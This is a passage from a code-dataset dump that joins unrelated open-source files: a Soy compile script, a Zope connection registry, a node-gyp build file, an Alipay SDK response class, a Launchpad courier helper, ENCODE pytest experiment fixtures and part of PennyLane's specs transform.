if processed_langs:
print('Creating .js files...')
processed_lang_list = ','.join(processed_langs)
subprocess.check_call([
'java',
'-jar', os.path.join(args.path_to_jar, 'SoyToJsSrcCompiler.jar'),
'--locales', processed_lang_list,
'--shouldProvideRequireSoyNamespaces',
'--isUsingIjData',
'--messageFilePathFormat', args.output_dir + '{LOCALE}.xlf',
'--outputPathFormat', os.path.join(args.output_dir, '{LOCALE}', 'soy.js'),
'--srcs', args.template])
if len(processed_langs) == 1:
print('Created ' + processed_lang_list + '/soy.js in ' + args.output_dir)
else:
print('Created {' + processed_lang_list + '}/soy.js in ' + args.output_dir)
for lang in processed_langs:
os.remove(args.output_dir + lang + '.xlf')
print('Removed .xlf files.')
if __name__ == '__main__':
main()
|
src/Testing/ZopeTestCase/connections.py
|
rbanffy/Zope
| 289 |
76340
|
<reponame>rbanffy/Zope
##############################################################################
#
# Copyright (c) 2005 Zope Foundation and Contributors.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""ZODB connection registry
"""
class ConnectionRegistry:
'''ZODB connection registry
This registry can hold either ZODB.Connection objects or OFS.Application
objects. In the latter case, a close operation will close the REQUEST as
well as the Connection referenced by the Application's _p_jar attribute.
'''
def __init__(self):
self._conns = []
def register(self, conn):
self._conns.append(conn)
def contains(self, conn):
return conn in self._conns
def __len__(self):
return len(self._conns)
def count(self):
return len(self)
def close(self, conn):
if self.contains(conn):
self._conns.remove(conn)
self._do_close(conn)
def closeAll(self):
for conn in self._conns:
self._do_close(conn)
self._conns = []
def _do_close(self, conn):
if hasattr(conn, 'close'):
conn.close()
else:
conn.REQUEST.close()
conn._p_jar.close()
registry = ConnectionRegistry()
register = registry.register
contains = registry.contains
count = registry.count
close = registry.close
closeAll = registry.closeAll
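# Illustrative sketch (not part of the original module): the registry accepts any
# object exposing close(), so a dummy connection is enough to exercise the
# register/close lifecycle (counts assume a freshly imported, empty registry).
def _example_registry_usage():
    class _DummyConnection:
        closed = False
        def close(self):
            self.closed = True
    conn = _DummyConnection()
    register(conn)
    assert contains(conn) and count() == 1
    close(conn)
    assert conn.closed and count() == 0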
|
cupy_alias/manipulation/transpose.py
|
fixstars/clpy
| 142 |
76368
|
from clpy.manipulation.transpose import * # NOQA
|
binding.gyp
|
lideming/fuse-native
| 181 |
76385
|
<reponame>lideming/fuse-native<filename>binding.gyp
{
"targets": [{
"target_name": "fuse",
"include_dirs": [
"<!(node -e \"require('napi-macros')\")",
"<!(node -e \"require('fuse-shared-library/include')\")",
],
"libraries": [
"<!(node -e \"require('fuse-shared-library/lib')\")",
],
"sources": [
"fuse-native.c"
],
'xcode_settings': {
'OTHER_CFLAGS': [
'-g',
'-O3',
'-Wall'
]
},
'cflags': [
'-g',
'-O3',
'-Wall'
],
}, {
"target_name": "postinstall",
"type": "none",
"dependencies": ["fuse"],
"copies": [{
"destination": "build/Release",
"files": [ "<!(node -e \"require('fuse-shared-library/lib')\")" ],
}]
}]
}
|
alipay/aop/api/response/AlipayOverseasTravelShopSyncResponse.py
|
antopen/alipay-sdk-python-all
| 213 |
76408
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayOverseasTravelShopSyncResponse(AlipayResponse):
def __init__(self):
super(AlipayOverseasTravelShopSyncResponse, self).__init__()
self._shop_biz_status = None
self._sync_order_id = None
self._sync_status = None
@property
def shop_biz_status(self):
return self._shop_biz_status
@shop_biz_status.setter
def shop_biz_status(self, value):
self._shop_biz_status = value
@property
def sync_order_id(self):
return self._sync_order_id
@sync_order_id.setter
def sync_order_id(self, value):
self._sync_order_id = value
@property
def sync_status(self):
return self._sync_status
@sync_status.setter
def sync_status(self, value):
self._sync_status = value
def parse_response_content(self, response_content):
response = super(AlipayOverseasTravelShopSyncResponse, self).parse_response_content(response_content)
if 'shop_biz_status' in response:
self.shop_biz_status = response['shop_biz_status']
if 'sync_order_id' in response:
self.sync_order_id = response['sync_order_id']
if 'sync_status' in response:
self.sync_status = response['sync_status']
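# Illustrative sketch (not part of the SDK): the generated properties can be set
# and read directly; parse_response_content() is normally driven by the SDK
# client with the raw gateway payload. Field values below are placeholders.
def _example_response_fields():
    resp = AlipayOverseasTravelShopSyncResponse()
    resp.shop_biz_status = 'OPEN'
    resp.sync_status = 'SUCCESS'
    return resp.shop_biz_status, resp.sync_order_id, resp.sync_status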
|
launchpad/nodes/courier/courier_utils.py
|
leloykun/launchpad
| 264 |
76436
|
# Lint as: python3
# Copyright 2020 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Courier utilities."""
from typing import Any, Callable, Text
from absl import logging
import courier
def _should_expose_method(func: Callable[..., Any], method_name: Text) -> bool:
return (callable(func) and not method_name.startswith('_') and
method_name != 'set_courier_server')
def make_courier_server(instance: Any, *courier_args,
**courier_kwargs) -> courier.Server:
"""Builds a courier.Server for an instance.
Args:
instance: The instance that the courier server associates with.
*courier_args: positional arguments to pass to courier.Server().
**courier_kwargs: keyword arguments to pass to courier.Server().
Returns:
A courier.Server object.
"""
server = courier.Server(*courier_args, **courier_kwargs)
# Bind all non-private user-defined local methods.
for method_name in dir(instance):
if method_name.startswith('_'):
continue
func = getattr(instance, method_name)
logging.info('Binding: %s', method_name)
if _should_expose_method(func, method_name):
server.Bind(method_name, func)
return server
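# Illustrative sketch (assumes the courier package is importable; the server name
# given below is a placeholder forwarded straight to courier.Server along with
# any other positional/keyword arguments):
#
#   class Greeter:
#     def hello(self, name):
#       return 'Hello, {}!'.format(name)
#
#   server = make_courier_server(Greeter(), 'greeter_server')
#   # Every public method of Greeter (here: hello) is now bound on the server;
#   # starting and serving it uses the regular courier.Server API.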
|
src/encoded/tests/fixtures/schemas/experiment.py
|
procha2/encoded
| 102 |
76441
|
<gh_stars>100-1000
import pytest
@pytest.fixture
def experiment_chip_control(testapp, lab, award, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-10-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'control_type': 'input library'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_chip_H3K4me3(testapp, lab, award, target_H3K4me3, ileum, experiment_chip_control):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-10-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K4me3['uuid'],
'possible_controls': [experiment_chip_control['@id']]
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
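# Illustrative sketch (not part of the fixture module): tests elsewhere consume
# these fixtures simply by naming them as parameters; assuming posted properties
# round-trip in the '@graph' response, a consumer could check them directly.
def _example_uses_chip_fixtures(experiment_chip_H3K4me3, experiment_chip_control):
    assert experiment_chip_control['control_type'] == 'input library'
    assert experiment_chip_H3K4me3['status'] == 'released'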
@pytest.fixture
def experiment_chip_H3K27me3(testapp, lab, award, target_H3K27me3, experiment_chip_control, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K27me3['uuid'],
'possible_controls': [experiment_chip_control['uuid']]
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_chip_CTCF(testapp, lab, award, target_CTCF, k562):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-10-08',
'biosample_ontology': k562['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_CTCF['uuid']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_rna(testapp, lab, award, h1):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-10-08',
'assay_term_name': 'RNA-seq',
'biosample_ontology': h1['uuid']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_dnase(testapp, lab, award, heart):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-10-08',
'assay_term_name': 'DNase-seq',
'biosample_ontology': heart['uuid']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def ctrl_experiment(testapp, lab, award, cell_free):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'biosample_ontology': cell_free['uuid'],
'status': 'in progress',
'assay_term_name': 'ChIP-seq'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_no_read_length(
testapp,
experiment,
bam_file,
file_fastq_no_read_length,
replicate_1_1,
base_library,
analysis_step_bam,
analysis_step_version_bam,
analysis_step_run_bam,
encode_lab,
):
testapp.patch_json(replicate_1_1['@id'], {'experiment': experiment['@id'],
'library': base_library['@id'],
})
testapp.patch_json(file_fastq_no_read_length['@id'], {'dataset': experiment['@id'],
'replicate':replicate_1_1['@id'],
})
testapp.patch_json(bam_file['@id'], {'dataset': experiment['@id'],
'step_run': analysis_step_run_bam['@id'],
'assembly': 'GRCh38',
'lab': encode_lab['@id'],
'derived_from': [file_fastq_no_read_length['@id']],
})
testapp.patch_json(experiment['@id'], {'status': 'released',
'date_released': '2016-01-01',
'assay_term_name': 'long read RNA-seq',
})
return testapp.get(experiment['@id'] + '@@index-data')
@pytest.fixture
def file_exp(lab, award, testapp, experiment, ileum):
item = {
'lab': lab['uuid'],
'award': award['uuid'],
'assay_term_name': 'RAMPAGE',
'biosample_ontology': ileum['uuid'],
'possible_controls': [experiment['uuid']],
'status': 'released',
'date_released': '2016-01-01'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def file_exp2(lab, award, testapp, ileum):
item = {
'lab': lab['uuid'],
'award': award['uuid'],
'assay_term_name': 'RAMPAGE',
'biosample_ontology': ileum['uuid'],
'status': 'released',
'date_released': '2016-01-01'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_RNA_seq(testapp, lab, award, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'RNA-seq'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_RRBS(testapp, lab, award, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'assay_term_name': 'RRBS',
'biosample_ontology': ileum['uuid']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_WGBS(testapp, lab, award, ileum):
item = {
'award': award['uuid'],
'biosample_ontology': ileum['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'assay_term_name': 'whole-genome shotgun bisulfite sequencing'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_control(testapp, lab, award, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'control_type': 'control'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K27me3(testapp, lab, award, target_H3K27me3, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K27me3['uuid']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K36me3(testapp, lab, award, target_H3K36me3, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K36me3['uuid']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K4me1(testapp, lab, award, target_H3K4me1, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K4me1['uuid']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K4me3(testapp, lab, award, target_H3K4me3, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K4me3['uuid']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K27ac(testapp, lab, award, target_H3K27ac, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K27ac['uuid']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K9me3(testapp, lab, award, target_H3K9me3, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K9me3['uuid']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_pipeline_error(testapp, lab, award, cell_free):
item = {
'lab': lab['@id'],
'award': award['@id'],
'assay_term_name': 'ChIP-seq',
'biosample_ontology': cell_free['uuid'],
'internal_status': 'pipeline error',
}
return item
@pytest.fixture
def experiment_no_error(testapp, lab, award, cell_free):
item = {
'lab': lab['@id'],
'award': award['@id'],
'assay_term_name': 'ChIP-seq',
'biosample_ontology': cell_free['uuid'],
'internal_status': 'release ready',
}
return item
@pytest.fixture
def experiment_1(testapp, lab, award, cell_free):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'assay_term_name': 'RNA-seq',
'biosample_ontology': cell_free['uuid'],
'status': 'in progress'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_2(testapp, lab, award, cell_free):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'assay_term_name': 'RNA-seq',
'biosample_ontology': cell_free['uuid'],
'status': 'in progress'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def base_experiment_submitted(testapp, lab, award, cell_free):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'assay_term_name': 'RNA-seq',
'biosample_ontology': cell_free['uuid'],
'status': 'submitted',
'date_submitted': '2015-07-23',
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_1_0(root, experiment, file, file_ucsc_browser_composite):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
assert root.get_by_uuid(
file['uuid']).properties['dataset'] == str(item.uuid)
assert root.get_by_uuid(
file_ucsc_browser_composite['uuid']).properties['dataset'] != str(item.uuid)
properties.update({
'schema_version': '1',
'files': [file['uuid'], file_ucsc_browser_composite['uuid']]
})
return properties
@pytest.fixture
def experiment_2_0():
return {
'schema_version': '2',
'encode2_dbxrefs': ['wgEncodeEH002945'],
'geo_dbxrefs': ['GSM99494'],
}
@pytest.fixture
def experiment_3():
return {
'schema_version': '3',
'status': "DELETED",
}
@pytest.fixture
def experiment_6():
return {
'schema_version': '6',
'dataset_type': 'experiment',
}
@pytest.fixture
def experiment_7(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '7',
'dbxrefs': ['UCSC-ENCODE-cv:K562', 'UCSC-ENCODE-cv:K562'],
'aliases': ['testing:123', 'testing:123']
})
return properties
@pytest.fixture
def experiment_10(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '10',
'status': 'in progress',
'aliases': [
'andrew-fire:my_experiment',
'j-michael-cherry:Lib:XZ:20100107:11--ChIP:XZ:20100104:09:AdiposeNuclei:H3K4Me3',
'roadmap-epigenomics:Bisulfite-Seq analysis of ucsf-4* stem cell line from UCSF-4||Tue Apr 16 16:10:36 -0500 2013||85822',
'encode:[this is]_qu#ite:bad" ',
'manuel-garber:10% DMSO for 2 hours',
'UCSC_encode_db:Illumina_HiSeq_2000',
'encode:Illumina_HiSeq_2000'
]
})
return properties
@pytest.fixture
def experiment_13(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '13',
'status': 'proposed',
})
return properties
@pytest.fixture
def experiment_14(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '14',
'biosample_type': 'in vitro sample',
})
return properties
@pytest.fixture
def experiment_15(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '15',
'biosample_type': 'immortalized cell line'
})
return properties
@pytest.fixture
def experiment_16(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '16',
'biosample_type': 'immortalized cell line',
'status': 'ready for review'
})
return properties
@pytest.fixture
def experiment_17(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '17',
'biosample_type': 'immortalized cell line',
'status': 'started'
})
return properties
@pytest.fixture
def experiment_21(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '21',
'biosample_type': 'induced pluripotent stem cell line',
'status': 'started'
})
return properties
@pytest.fixture
def experiment_22(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '22',
'biosample_type': 'primary cell',
'biosample_term_id': 'CL:0000765',
'biosample_term_name': 'erythroblast',
'internal_tags': ['cre_inputv10', 'cre_inputv11', 'ENCYCLOPEDIAv3'],
'status': 'started'
})
return properties
@pytest.fixture
def experiment_25(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '25',
'assay_term_name': 'ISO-seq'
})
return properties
@pytest.fixture
def experiment_26(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '26',
'assay_term_name': 'single-nuclei ATAC-seq'
})
return properties
@pytest.fixture
def experiment_27(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '27',
'experiment_classification': ['functional genomics assay']
})
return properties
@pytest.fixture
def experiment(testapp, lab, award, cell_free):
item = {
'lab': lab['@id'],
'award': award['@id'],
'assay_term_name': 'RNA-seq',
'biosample_ontology': cell_free['uuid']
}
return testapp.post_json('/experiment', item).json['@graph'][0]
@pytest.fixture
def base_experiment(testapp, lab, award, heart):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'assay_term_name': 'RNA-seq',
'biosample_ontology': heart['uuid'],
'status': 'in progress'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_with_RNA_library(
testapp,
base_experiment,
base_replicate,
base_library,
):
testapp.patch_json(base_library['@id'], {'nucleic_acid_term_name': 'RNA'})
testapp.patch_json(base_replicate['@id'], {'library': base_library['@id']})
return testapp.get(base_experiment['@id'] + '@@index-data')
@pytest.fixture
def ChIP_experiment(testapp, lab, award, cell_free, target, base_matched_set):
item = {
'lab': lab['@id'],
'award': award['@id'],
'assay_term_name': 'ChIP-seq',
'biosample_ontology': cell_free['uuid'],
'target': target['@id'],
'possible_controls': [
base_matched_set['@id']]
}
return testapp.post_json('/experiment', item).json['@graph'][0]
@pytest.fixture
def micro_rna_experiment(
testapp,
base_experiment,
replicate_1_1,
replicate_2_1,
library_1,
library_2,
biosample_1,
biosample_2,
mouse_donor_1_6,
file_fastq_3,
file_fastq_4,
file_bam_1_1,
file_bam_2_1,
file_tsv_1_1,
file_tsv_1_2,
spearman_correlation_quality_metric,
micro_rna_quantification_quality_metric_1_2,
micro_rna_mapping_quality_metric_2_1,
analysis_step_run_bam,
analysis_step_version_bam,
analysis_step_bam,
pipeline_bam,
):
testapp.patch_json(file_fastq_3['@id'], {'read_length': 20})
testapp.patch_json(file_fastq_4['@id'], {'read_length': 100})
testapp.patch_json(
file_bam_1_1['@id'],
{'step_run': analysis_step_run_bam['@id'], 'assembly': 'mm10'}
)
testapp.patch_json(
file_bam_2_1['@id'],
{'step_run': analysis_step_run_bam['@id'], 'assembly': 'mm10'}
)
testapp.patch_json(
pipeline_bam['@id'],
{'title': 'microRNA-seq pipeline'}
)
testapp.patch_json(
spearman_correlation_quality_metric['@id'],
{'quality_metric_of': [file_tsv_1_1['@id'], file_tsv_1_2['@id']]}
)
testapp.patch_json(biosample_1['@id'], {'donor': mouse_donor_1_6['@id']})
testapp.patch_json(biosample_2['@id'], {'donor': mouse_donor_1_6['@id']})
testapp.patch_json(biosample_1['@id'], {'organism': '/organisms/mouse/'})
testapp.patch_json(biosample_2['@id'], {'organism': '/organisms/mouse/'})
testapp.patch_json(biosample_1['@id'], {'model_organism_sex': 'mixed'})
testapp.patch_json(biosample_2['@id'], {'model_organism_sex': 'mixed'})
testapp.patch_json(library_1['@id'], {'biosample': biosample_1['@id']})
testapp.patch_json(library_2['@id'], {'biosample': biosample_2['@id']})
testapp.patch_json(replicate_1_1['@id'], {'library': library_1['@id']})
testapp.patch_json(replicate_2_1['@id'], {'library': library_2['@id']})
testapp.patch_json(file_tsv_1_1['@id'], {'output_type': 'microRNA quantifications'})
testapp.patch_json(file_tsv_1_2['@id'], {'output_type': 'microRNA quantifications'})
testapp.patch_json(
base_experiment['@id'],
{'status': 'released', 'date_released': '2016-01-01', 'assay_term_name': 'microRNA-seq'}
)
return testapp.get(base_experiment['@id'] + '@@index-data')
@pytest.fixture
def experiment_with_analysis(testapp, lab, award, heart, analysis_1):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'assay_term_name': 'ChIP-seq',
'status': 'in progress',
'biosample_ontology': heart['uuid'],
'analyses': [analysis_1['@id']]
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_with_analysis_2(testapp, lab, award, heart, analysis_2):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'assay_term_name': 'ChIP-seq',
'status': 'in progress',
'biosample_ontology': heart['uuid'],
'analyses': [analysis_2['@id']]
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_28(testapp, lab, award, heart):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'assay_term_name': 'Mint-ChIP-seq',
'biosample_ontology': heart['uuid'],
'status': 'in progress'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_v28(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '28',
'internal_status': 'pipeline error',
'pipeline_error_detail': 'The pipeline didn\'t work for reasons',
'notes': 'Insert essential details here'
})
return properties
@pytest.fixture
def ATAC_experiment(testapp, lab, award, cell_free):
item = {
'lab': lab['@id'],
'award': award['@id'],
'assay_term_name': 'ATAC-seq',
'biosample_ontology': cell_free['uuid']
}
return testapp.post_json('/experiment', item).json['@graph'][0]
@pytest.fixture
def experiment_29(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '29',
'assay_term_name': 'single cell isolation followed by RNA-seq'
})
return properties
@pytest.fixture
def experiment_mint_chip(testapp, lab, award, heart, target_H3K27me3, experiment_chip_control):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'assay_term_name': 'Mint-ChIP-seq',
'biosample_ontology': heart['uuid'],
'status': 'in progress',
'target': target_H3K27me3['uuid'],
'possible_controls': [experiment_chip_control['uuid']]
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def ATAC_experiment_replicated(testapp, lab, award, heart):
item = {
'lab': lab['@id'],
'award': award['@id'],
'assay_term_name': 'ATAC-seq',
'biosample_ontology': heart['uuid']
}
return testapp.post_json('/experiment', item).json['@graph'][0]
@pytest.fixture
def experiment_30(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '30',
'analyses': [
{
'files': ['/files/ENCFF881NAX/', '/files/ENCFF674HJF/']
},
{
'files': ['/files/ENCFF282TIA/', '/files/ENCFF910JDS/']
},
],
'notes': 'Previous notes.'
})
return properties
@pytest.fixture
def ChIA_PET_experiment(testapp, lab, encode4_award, heart):
item = {
'lab': lab['@id'],
'award': encode4_award['@id'],
'assay_term_name': 'ChIA-PET',
'biosample_ontology': heart['uuid']
}
return testapp.post_json('/experiment', item).json['@graph'][0]
@pytest.fixture
def experiment_31(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '31',
'assay_term_name': 'single-nucleus RNA-seq'
})
return properties
@pytest.fixture
def BruChase_2h(testapp, lab, award, heart):
item = {
'lab': lab['@id'],
'award': award['@id'],
'assay_term_name': 'BruChase',
'biosample_ontology': heart['uuid']
}
return testapp.post_json('/experiment', item).json['@graph'][0]
@pytest.fixture
def BruChase_6h(testapp, lab, award, heart):
item = {
'lab': lab['@id'],
'award': award['@id'],
'assay_term_name': 'BruChase',
'biosample_ontology': heart['uuid']
}
return testapp.post_json('/experiment', item).json['@graph'][0]
@pytest.fixture
def single_cell_ATAC_experiment(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '32',
'assay_term_name': 'single-cell ATAC-seq'
})
return properties
@pytest.fixture
def experiment_33(root, experiment, analysis_released):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '33',
'analysis_objects': [analysis_released['uuid']]
})
return properties
@pytest.fixture
def base_single_cell_experiment_submitted(testapp, lab, award, heart):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'assay_term_name': 'single-cell RNA sequencing assay',
'biosample_ontology': heart['uuid'],
'status': 'submitted',
'date_submitted': '2015-07-23',
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_34(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '34',
'internal_tags': ['RegulomeDB']
})
return properties
@pytest.fixture
def experiment_35(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '35',
'assay_term_name': 'Capture Hi-C'
})
return properties
|
pennylane/transforms/specs.py
|
ral9000/pennylane
| 712 |
76447
|
# Copyright 2018-2021 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Code for resource estimation"""
import inspect
import pennylane as qml
def _get_absolute_import_path(fn):
return f"{inspect.getmodule(fn).__name__}.{fn.__name__}"
def specs(qnode, max_expansion=None):
"""Resource information about a quantum circuit.
This transform converts a QNode into a callable that provides resource information
about the circuit.
Args:
qnode (.QNode): the QNode to calculate the specifications for
Keyword Args:
max_expansion (int): The number of times the internal circuit should be expanded when
calculating the specification. Defaults to ``qnode.max_expansion``.
Returns:
A function that has the same argument signature as ``qnode``. This function
returns a dictionary of information about the QNode's structure.
**Example**
.. code-block:: python3
x = np.array([0.1, 0.2])
dev = qml.device('default.qubit', wires=2)
@qml.qnode(dev)
def circuit(x, add_ry=True):
qml.RX(x[0], wires=0)
qml.CNOT(wires=(0,1))
if add_ry:
qml.RY(x[1], wires=1)
return qml.probs(wires=(0,1))
>>> qml.specs(circuit)(x, add_ry=False)
{'gate_sizes': defaultdict(int, {1: 1, 2: 1}),
'gate_types': defaultdict(int, {'RX': 1, 'CNOT': 1}),
'num_operations': 2,
'num_observables': 1,
'num_diagonalizing_gates': 0,
'num_used_wires': 2,
'depth': 2,
'num_device_wires': 2,
'device_name': 'default.qubit.autograd',
'diff_method': 'backprop'}
.. UsageDetails::
``qml.specs`` can also be used with :class:`~.beta.qnode`:
.. code-block:: python3
x = np.array([0.1, 0.2])
dev = qml.device('default.qubit', wires=2)
@qml.beta.qnode(dev, diff_method="parameter-shift", shift=np.pi / 4)
def circuit(x, add_ry=True):
qml.RX(x[0], wires=0)
qml.CNOT(wires=(0,1))
if add_ry:
qml.RY(x[1], wires=1)
return qml.probs(wires=(0,1))
>>> qml.specs(circuit)(x, add_ry=False)
{'gate_sizes': defaultdict(int, {1: 1, 2: 1}),
